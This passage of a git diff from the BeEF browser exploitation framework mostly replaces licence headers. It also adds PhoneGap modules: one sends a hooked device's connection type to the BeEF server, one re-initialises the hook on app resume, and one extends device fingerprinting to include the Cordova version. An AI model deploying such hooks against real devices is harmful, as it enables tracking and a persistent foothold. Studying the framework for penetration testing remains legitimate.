for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_above < BeEF::Core::Command diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js index 148b64eb0..9e64a64e4 100644 --- a/modules/persistence/man_in_the_browser/command.js +++ b/modules/persistence/man_in_the_browser/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ beef.execute(function() { try{ diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml index 1f022ef1d..732b3e31f 100644 --- a/modules/persistence/man_in_the_browser/config.yaml +++ b/modules/persistence/man_in_the_browser/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb index 75e8255c0..6035522ba 100644 --- a/modules/persistence/man_in_the_browser/module.rb +++ b/modules/persistence/man_in_the_browser/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Man_in_the_browser < BeEF::Core::Command diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index 92cc6b07b..dc89768e9 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Pop-under window successfully created!"; diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml index 8af49d40c..baed13237 100644 --- a/modules/persistence/popunder_window/config.yaml +++ b/modules/persistence/popunder_window/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb index 850d1b6b6..c9612e35f 100644 --- a/modules/persistence/popunder_window/module.rb +++ b/modules/persistence/popunder_window/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Popunder_window < BeEF::Core::Command diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js index 1bf39ecce..91802774f 100644 --- a/modules/phonegap/phonegap_beep/command.js +++ b/modules/phonegap/phonegap_beep/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // make the phone beep // beef.execute(function() { diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml index c474553aa..ef5ce3c3c 100644 --- a/modules/phonegap/phonegap_beep/config.yaml +++ b/modules/phonegap/phonegap_beep/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb index 013ae3b3c..9f7743d7e 100644 --- a/modules/phonegap/phonegap_beep/module.rb +++ b/modules/phonegap/phonegap_beep/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js new file mode 100644 index 000000000..c5791aff7 --- /dev/null +++ b/modules/phonegap/phonegap_check_connection/command.js @@ -0,0 +1,29 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +beef.execute(function() { + var connection_type; + + getConnectionType = function() { + var states = {}; + states[Connection.UNKNOWN] = 'Unknown connection'; + states[Connection.ETHERNET] = 'Ethernet connection'; + states[Connection.WIFI] = 'WiFi connection'; + states[Connection.CELL_2G] = 'Cell 2G connection'; + states[Connection.CELL_3G] = 'Cell 3G connection'; + states[Connection.CELL_4G] = 'Cell 4G connection'; + states[Connection.NONE] = 'No network connection'; + return states[navigator.network.connection.type]; + } + + try { + connection_type = getConnectionType(); + } catch(e) { + connection_type = "Unable to determine connection type." + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type); +}); diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml new file mode 100644 index 000000000..a4734289e --- /dev/null +++ b/modules/phonegap/phonegap_check_connection/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# +beef: + module: + phonegap_check_connection: + enable: true + category: "Phonegap" + name: "Check connection" + description: "Find out connection type e.g. Wifi, 3G.." + authors: ["mh"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb new file mode 100644 index 000000000..12f2ab5d0 --- /dev/null +++ b/modules/phonegap/phonegap_check_connection/module.rb @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# + +class Phonegap_check_connection < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js index 1c0ae566b..63afc69fd 100644 --- a/modules/phonegap/phonegap_detect/command.js +++ b/modules/phonegap/phonegap_detect/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // detect phonegap // beef.execute(function() { @@ -23,6 +14,7 @@ beef.execute(function() { phonegap_details = "" + " name: " + device.name + " phonegap api: " + device.phonegap + + " cordova api: " + device.cordova + " platform: " + device.platform + " uuid: " + device.uuid + " version: " + device.version; diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml index e1e55e846..c68722597 100644 --- a/modules/phonegap/phonegap_detect/config.yaml +++ b/modules/phonegap/phonegap_detect/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb index 8242c79e8..dfb9c178e 100644 --- a/modules/phonegap/phonegap_detect/module.rb +++ b/modules/phonegap/phonegap_detect/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js index c6b15e78e..fcf418b7b 100644 --- a/modules/phonegap/phonegap_file_upload/command.js +++ b/modules/phonegap/phonegap_file_upload/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml index f82d42fe8..f873bedd4 100644 --- a/modules/phonegap/phonegap_file_upload/config.yaml +++ b/modules/phonegap/phonegap_file_upload/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb index 41b5f712f..3f058b4b5 100644 --- a/modules/phonegap/phonegap_file_upload/module.rb +++ b/modules/phonegap/phonegap_file_upload/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js index 15ea8fbf7..25d0d0095 100644 --- a/modules/phonegap/phonegap_geo_locate/command.js +++ b/modules/phonegap/phonegap_geo_locate/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // geo locate // beef.execute(function() { diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml index cb2a83894..af9f421a8 100644 --- a/modules/phonegap/phonegap_geo_locate/config.yaml +++ b/modules/phonegap/phonegap_geo_locate/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb index 848d32e62..e66d6818e 100644 --- a/modules/phonegap/phonegap_geo_locate/module.rb +++ b/modules/phonegap/phonegap_geo_locate/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js index 14bdd0406..f9063a5bc 100644 --- a/modules/phonegap/phonegap_list_files/command.js +++ b/modules/phonegap/phonegap_list_files/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml index a4a20c709..8e46172c1 100644 --- a/modules/phonegap/phonegap_list_files/config.yaml +++ b/modules/phonegap/phonegap_list_files/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb index 51cff073c..4d2d068a9 100644 --- a/modules/phonegap/phonegap_list_files/module.rb +++ b/modules/phonegap/phonegap_list_files/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js new file mode 100644 index 000000000..65df0464d --- /dev/null +++ b/modules/phonegap/phonegap_persist_resume/command.js @@ -0,0 +1,22 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +// +// persist on over app's sleep/wake events +beef.execute(function() { + var result; + + try { + document.addEventListener("resume", beef_init(), false); + result = 'success'; + + } catch (e) { + for(var n in e) { + result+= n + " " + e[n] + "\n"; + } + } + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml new file mode 100644 index 000000000..0248549c6 --- /dev/null +++ b/modules/phonegap/phonegap_persist_resume/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +# persist on over app's sleep/wake events +beef: + module: + phonegap_persist_resume: + enable: true + category: "Phonegap" + name: "Persist resume" + description: "Persist over applications sleep/wake events" + authors: ["mh"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb new file mode 100644 index 000000000..f324866f7 --- /dev/null +++ b/modules/phonegap/phonegap_persist_resume/module.rb @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +# persist on over app's sleep/wake events +class Phonegap_persist_resume < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js index 7944fa756..60936c0fb 100644 --- a/modules/phonegap/phonegap_persistence/command.js +++ b/modules/phonegap/phonegap_persistence/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // persistence // beef.execute(function() { diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml index 7d449e7c9..f8f6a3201 100644 --- a/modules/phonegap/phonegap_persistence/config.yaml +++ b/modules/phonegap/phonegap_persistence/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistence # diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 30face23d..35c565aeb 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistenece # diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js index 503fc606d..35619852c 100644 --- a/modules/phonegap/phonegap_start_record_audio/command.js +++ b/modules/phonegap/phonegap_start_record_audio/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml index 28e228adc..498874ada 100644 --- a/modules/phonegap/phonegap_start_record_audio/config.yaml +++ b/modules/phonegap/phonegap_start_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb index 1a24663cb..7e8f6ebe3 100644 --- a/modules/phonegap/phonegap_start_record_audio/module.rb +++ b/modules/phonegap/phonegap_start_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js index 0463a023c..72dd96b18 100644 --- a/modules/phonegap/phonegap_stop_record_audio/command.js +++ b/modules/phonegap/phonegap_stop_record_audio/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade 